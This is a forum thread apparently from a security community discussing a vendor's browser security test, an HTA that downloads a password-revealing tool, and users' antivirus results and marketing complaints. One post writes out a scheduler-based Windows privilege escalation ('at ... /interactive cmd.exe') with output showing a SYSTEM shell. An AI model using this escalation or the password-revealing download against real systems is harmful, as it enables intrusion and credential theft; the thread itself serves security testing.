Beta browser test - Too harsh? Too mild?

Well...You could always read my signature and use the one that has green in it's name or at least something similar.

Thanks,

Chris

 

Hey Kevin,
Since IE7 is out, I've updated the wilderspass.hta to use IE Pass View instead of Password Revealer. It now downloads the binary iepassvw.exe instead of the old password.exe.

Both password modules reveal too much to include in the scan test. I am searching for a command-line based partial password revealer since I'm not clever enough to write one myself. If anyone knows of one, please let me know.

I'm also wondering if I should add a scheduler service privilege escalation test since many security vendors miss this easily scripted escalation:

Code:

c:\> time /t
9:00 PM
c:\> at 21:01 /interactive cmd.exe
[+C:\]at
Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
        1   Today                9:01 PM       cmd.exe
c:\> time /t
9:01 PM
[+C:\]tasklist /V | find "cmd.exe"
...
cmd.exe       4660 RDP-Tcp#9     0   2,916 K Running   NT AUTHORITY\SYSTEM
...

 

- good way to sell greenborder
- greenborder 5/5
- initially stopped by my firewall/intrusion, suspicious activity...also running virtual machine so no problem.
- running antivirus, antispyware only virtual machine, 1/5 (stopping script)

crank it up now Bill

Limited a/c is a cheap option - 5/5

 

Antivir is in action.

 

Agile - Looks like you saved it to disk manually. If you ran the hta, did IE Pass View launch before AntVir found it on disk?

 

Ya I did so.
Will try it again and let you know. U want me to run it directly or after saving on disk?

 

Just curious, had you run from the URL, I would expect IE Pass View would run before AntVir could do anything about it.

 

It's not cheap option.

It's free option.

While others keep installing different HIPS, they forget there is already 1 HIPS in everybody's computer, that is limited account HIPS.

 

yes exactly

 

Tried again both by running directly and by saving it to disk and running afterwards. Antivir is no longer detecting it. It is strange!

 

It,s now interesting.
Antivir detects now the browser test as malware.

BTw this test is not beta in my opinion. I will call it Alpha.

 

Hi,

I have a few questions about the test: I don´t get it, eventhough I passed all the tests, I still see the "Stolen Files" folder on my desktop. And I also get the blank startup entry plus the Disk Management tool is launched (without admin rights though).

To give more info about the events after running the HTA file:

- Arovax Shield blocks the Startup entry
- ZoneAlarm Pro blocks HTML Application host from accessing the "Trusted Zone"
- SSM blocks running "cmd.exe"

Btw, Windows Scripting Host and Command Prompt are disabled on my system. And my browser (Maxthon) runs in "non-admin" mode. Any comments?

 

Rasheed187, the Disk Man. tool launch (blank) with permissions alert correct? meaning a pass as nothing could happen.
Your other two, I dont understand.

 

I ran the security test on my computer, and I like to say that this security test is nothing more than another marketing attempt aimed at selling a particular security product.
It's like telling me in the face: nadirah, your computer has failed x out of x tests, get greenborder today to protect against these threats!
And of course, my system security is not undermined. I can set more security restrictions at any time I want.

 

I'm not sure what you mean? You failed the tests but you say your security is not undermined but then you say you can set more restrictions at any time. Can you explain please? Also of course this is marketing attempt same as Comodo releases leaktest that I'm pretty sure their product will pass and DCS released APT tests which I think Processguard passes most if not all System safety monitor released so me keylogger test and Process termination test which they probably pass as well. So I agree that it is a marketing attempt but also tests your security. Or dont you agree?

Thanks,

Chris

 

I just tried the security test just for fun and gave my comments about it. What I meant was, the browser sec. test does not in any way undermine my system security. I just tried it to see what it could expose about my system.

I tend to rely more on common sense, knowledge and good safety techniques to secure my system. And it works. So when I say it does not undermine my system security it means that I've verified and confirmed that my system is clean and it is unlikely that anything like this will affect my security unless I let my guard down.

 

So, i went to ... little test ...

http://www.greenborder.com/scan/index.hta

even if i consider that as false positive
after examine of hta code this made me wonder
http://www.greenborder.com/scan/containment/password.exe
so another test ... oops

so You guys either use trojan or trojan code in unchaged way for "security test" to sell so called "Security product" by so called "security firm" ...

erm ... i guess 'BAN&FORGET' is what describe what i just used for anything related to 'Greenborder' on ALL networks i manage ...

 

Horrid.

 

According to Dwarden, the results are shocking. I wouldn't advocate Greenborder to anyone at all.
If you people tried out their password.exe program, and checked the company who made it, password.exe is a malicious program. And please do understand that such programs can be abused by malicious users.

PRESENTING THE CREATOR OF PASSWORD.EXE
---------------------------------------------------

 

seems like my sarcasm tone was too serious

anyway the point was if You gunna run online test made sure no AV/AT/AS can detect it/block it and break it before it start at all

i'm using several Nirsoft tools for quite time

 

I use several toys from Nirsoft as well, what's wrong with it?

Gerard

 

U might cal them potentially dangerous software.

 

Rasheed - In a virtualized environment it appears the folder may get created and virtualized files would get copied. I'll have to look into it, thanks for pointing that out. Also possibly you tested with GreenBorder disabled, and the folder was there already?

Nadira - Hi, I have control of the tests, but Marketing has control of the website. So, yes, it is one of the many security tests out there, and marketing will use it as well.

In this thread I focused on the test, and I haven't explained what GreenBorder is or does, or that there may be better demonstrations of it's protection (such as opening real malware inside the environment). In a nutshell; GreenBorder protects your computer from browser activity and the applications which are used to open downloads. So if there's a .doc file on a website which contains a malicious macro script, you can open it without worry. I also consider an .hta to be a document since it's not an executable by itself. For more info see the marketing material on the GreenBorder website.

Dwarden - Thanks for the info, looks like the AV vendors are responding to customer queries and the test is earning it's own signatures. I purposely separated the wilderspass.hta since I'm testing it using a known Nirsoft tool (which I mentioned earlier in this thread), and it was sure to be flagged (though interesting because it often launches before it's detected). I think the NirSoft tools are pretty useful and are not malware if people are informed what it does before they launch it as I did earlier in this thread. Btw - how did you test so many AVs so quickly? That's pretty good. Dobrou noc, diky, zes nasel ty AVs.

Also Dror updated the wilderspass.hta.

 

The activity graphic has been updated, no other functional changes yet.

 

I've made two changes today:

1) It now deletes the registry key it creates.
2) Wilderspass.hta no longer discloses the complete password. It only queries protected storage though.

Sorry for the latency, but I'm not a programmer.